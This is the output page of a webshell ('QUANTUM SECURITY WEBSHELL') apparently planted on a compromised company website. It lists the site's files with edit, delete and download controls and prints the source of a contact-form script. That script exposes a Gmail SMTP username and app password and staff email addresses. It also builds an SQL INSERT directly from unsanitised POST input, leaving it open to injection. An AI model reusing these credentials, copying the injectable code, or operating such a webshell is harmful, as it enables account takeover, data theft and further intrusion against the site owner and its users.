QUANTUM SECURITY WEBSHELL
≡
Server IP: 198.38.85.171
Client IP: 216.73.216.150
Server Info: Apache
PHP Version: 8.1.33
Current Path: /var/www/0e42a224-a8c4-422f-9596-709894267d02/public_html
Current Directory:
var
/
www
/
0e42a224-a8c4-422f-9596-709894267d02
/
public_html
/
Name
Size
Actions
..
[DIR]
[Open]
[Delete]
[Rename]
.htaccess
2378 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
.well-known
0 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
Event_test.php
8264 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
about-us.php
14070 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
admin
[DIR]
[Open]
[Delete]
[Rename]
assets
[DIR]
[Open]
[Delete]
[Rename]
blog-inner.php
5043 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
blog.php
15175 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
career-with-us.php
27148 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
class.phpmailer.php
76843 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
class.smtp.php
39906 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
conn.php
718 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
contact-us.php
8558 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
core-products.php
7420 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
cta.php
1199 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
download.php
2537 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
drager-x-node.php
8466 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
email-career.php
8256 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
email-contact.php
9579 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
email-popup_modal.php
8911 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
faqs.php
4413 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
footer.php
24988 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
gallery-photos.php
4397 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
gallery-photos.zip
143482593 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
gallery-video.php
1889 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
gs-bharat_03032026.zip
143417148 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
header.php
25305 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
images
[DIR]
[Open]
[Delete]
[Rename]
index.php
0 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
industries-we-serve.php
6045 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
key-customers.php
5088 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
knowledge-center.php
8707 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
news-event.php
7536 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
news-innernew.php
8466 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
our-product-range.php
10595 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
our-team.php
6075 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
page-not-found.php
1583 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
privacy-policy.php
18267 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
prod.php
16217 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
product-details-bkp-190424.php
32730 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
product-details.php
9610 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
product-details1.php
53879 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
product-inner-bkp-190423.php
41085 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
product-inner.php
5163 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
product-inner2.php
26151 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
product-items.php
5209 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
product-sub-category.php
18092 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
products-sub-menu.php
4073 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
robots.txt
79 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
services.php
4249 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
solver.txt
38 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
terms-and-condition.php
27028 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
thank-you.php
1673 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
web.config
3176 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
Editing: email-popup_modal.php
<?php ini_set('display_errors', '1'); ini_set('display_startup_errors', '1'); error_reporting(E_ALL); // include 'header.php'; include 'conn.php'; // include 'admin/conn.php'; include 'class.phpmailer.php'; include 'class.smtp.php'; function emailer($to, $bcc, $from, $from_name, $subject, $message) { try { $mail = new PHPMailer(); $smtp_debug = true; $mail->SMTPAuth = true; $mail->isSMTP(); // Set mailer to use SMTP $mail->Host = 'smtp.gmail.com'; $mail->Username = 'globalsolutionscommunication@gmail.com'; $mail->Password = 'nswayrmuamyadbll'; // SMTP password $mail->SMTPSecure = 'ssl'; // Enable TLS encryption, `ssl` also accepted $mail->Port = 465; $mail->setFrom($mail->Username, $from_name); // Set sender email and name // Add recipients in the 'To' field $AddressARRAY = explode(",", $to); foreach ($AddressARRAY as $address) { if (!empty($address)) { $mail->addAddress($address); // Add a 'To' recipient } } // Add recipients in the 'BCC' field $BccARRAY = explode(",", $bcc); foreach ($BccARRAY as $bccAddress) { if (!empty($bccAddress)) { $mail->addBCC($bccAddress); // Add a 'BCC' recipient } } $mail->addReplyTo($from); // Add reply-to address // Set email format to HTML $mail->isHTML(true); $mail->Subject = $subject; // Set the subject $mail->Body = $message; // Set the HTML body $mail->AltBody = strip_tags($message); // Set the alternative plain text body // Send the email and handle errors if (!$mail->send()) { echo 'Mailer error: ' . $mail->ErrorInfo; return false; // Return false if the mailer fails } else { return true; // Return true if the mail is sent successfully } } catch (Exception $e) { echo 'Exception caught: ', $e->getMessage(), "\n"; return false; } } //var_dump($mail);die; if (isset($_POST["submit1"])) { $fname = $_POST['fname']; $phone = $_POST['phone']; $email = $_POST['email']; $companyname = $_POST['companyname']; $designation = $_POST['designation']; $department = $_POST['department']; $profibus = $_POST['profibus']; $profinet = $_POST['flexRadioDefaultprofinet']; $registration_confirmation = $_POST['flexRadioDefaultregconf']; $errors = array(); //echo $profinet; die; if ($fname == "") { $errors['fname'] = 'name is required'; } elseif (preg_match('~[0-9]+~', $fname)) { $errors['fname'] = 'name cannot contain numeric characters'; } $phonePattern = '/^\d{10}$/'; // This pattern assumes a 10-digit phone number if (empty($phone)) { $errors['phone'] = 'Phone Number is required'; } elseif (!preg_match($phonePattern, $phone)) { $errors['phone'] = 'Invalid phone number format'; } if ($companyname == "") { $errors['companyname'] = 'name is required'; } elseif (preg_match('~[0-9]+~', $companyname)) { $errors['companyname'] = 'name cannot contain numeric characters'; } if ($designation == "") { $errors['designation'] = 'name is required'; } elseif (preg_match('~[0-9]+~', $designation)) { $errors['designation'] = 'name cannot contain numeric characters'; } if (empty($errors)) { $sql = "INSERT INTO popup (name,phone,email,cname,designation,department,profibus,profinet,registration_confirmation) VALUES ('$fname','$phone','$email','$companyname','$designation','$department','$profibus','$profinet','$registration_confirmation')"; $result = mysqli_query($conn, $sql); //echo $sql; die; if ($result) { // emailer($to,$from,$from_name,$subject,$message); // echo $test;die; $to = "sohel@vcantech.com"; $to1 = $email; $subject = 'Contact Us Inquiry'; if (!filter_var($email, FILTER_VALIDATE_EMAIL)) { echo "KINDLY PROVIDE VALID EMAIL"; } else { $body = ' <!DOCTYPE html> <html> <style> table { border : 1px solid #ddd; } table tr td{ padding: 5px; color:#000; } table, th, td { border : 1px solid #ddd; border-collapse: collapse; } table tr td:first-child {width: 40%;} tr, td , th { padding: 5px; text-align: left; } table#t01 tr:nth-child(even) {s background-color: #eee; } .footer{ text-align: center; background-color: #ec1a23; color: white; padding: 3px; } .logo{ text-align: center; /*background: #c4f1f1;*/ padding: 10px; } </style> <body> <tr> <div class="logo"> <a data-cursor="pointer" data-cursor="pointer" href="http://gs-bharat.com/"><img src="http://gs-bharat.com/assets/img/glosol-logo.png" width="25%" height="auto" /></a> </div> </tr><br> <tr> </tr><br> <h5>Hello GLOSOL Team</h5> <p>We have received an Contact inquiry from <b>' . $fname . '.</b></p> <table width="100%" bgcolor="#fff"cellpadding="0" cellspacing="0" border="" align="center" class="devicewidth"> <tbody> <tr> <td>Full Name</td> <td>' . $fname . '</td> </tr> <tr> <td>Contact Number</td> <td>' . $phone . '</td> </tr> <tr> <td>Email</td> <td>' . $email . '</td> </tr> <tr> <tr> <td>Company Name</td> <td>' . $companyname . '</td> </tr> <tr> <td>Designation</td> <td>' . $designation . '</td> </tr> <tr> <td>Department</td> <td>' . $department . '</td> </tr> <tr> <td>PROFIBUS User</td> <td>' . $profibus . '</td> </tr> <tr> <td>PROFINET User</td> <td>' . $profinet . '</td> </tr> <tr> <td>Registration Confirmation</td> <td>' . $registration_confirmation . '</td> </tr> </tbody> </table> <br> <div class= "footer" style=" text-align: center; background: black; padding: 2px; font-weight: 600;"> <p>Copyrights 2024, All rights Reserved by Global Solutions</P> </div> </body> </html>'; // var_dump($body);die; $Body1 = ' <!DOCTYPE html> <html> <style> table { border : 1px solid #ddd; } table tr td{ padding: 5px; color:#000; } table, th, td { border : 1px solid #ddd; border-collapse: collapse; } table tr td:first-child {width: 40%;} tr, td , th { padding: 5px; text-align: left; } table#t01 tr:nth-child(even) {s background-color: #eee; } .footer{ text-align: center; background-color: #db282c; color: white; padding: 3px; } .logo{ text-align: center; /*background: #c4f1f1;*/ padding: 10px; } </style> <body> <tr> <div class="logo"> <a data-cursor="pointer" data-cursor="pointer" href="http://gs-bharat.com/"><img src="http://gs-bharat.com/assets/img/glosol-logo.png" width="25%" height="auto" /></a> </div> </tr><br> <tr> </tr><br> <p> Dear Madam/Sir<br><br> Thank you for registering for the "Knowledge Sharing, Basic Diagnostic, and Troubleshooting Training on PROFIBUS and PROFINET." We are delighted to have you join us for this event.<br><br> Please find the event details below:<br> Date: 17th October 2024 <br> Time: 9:30 AM - 5:00 PM <br> Venue: Hyatt Palace - Bharuch <br> (Address: College Road, Opp. SVMIT College, Old NH8, Bharuch)<br><br> Should you require any further details or assistance, please do not hesitate to contact our team. We are here to support you and ensure you have a valuable experience.<br><br> Looking forward to seeing you at the event!<br><br> Best Regards,<br>Team, Global Solutions</p> <br> <div class= "footer" style=" text-align: center; background: #db282c; padding: 2px; font-weight: 600;"> <p style="color:white">Copyrights 2024, All rights Reserved by Global Solutions</P> </div> </body> </html>'; // var_dump($Body1);die; } $email_bcc = 'rajesh.patel@gs-bharat.com, support@vcantech.com'; emailer('info@gs-bharat.com', $email_bcc, $to1, $fname, 'Contact Us Form-Website', $body); emailer($to1, '','info@gs-bharat.com', 'Global Solutions', 'Confirmation of Your Registration for PROFIBUS and PROFINET Training', $Body1); header('Location:thank-you.php'); } else { header('Location:contact-us.php'); } } else { header('Location:contact-us.php'); } } ?>
Coded by
Ken.ph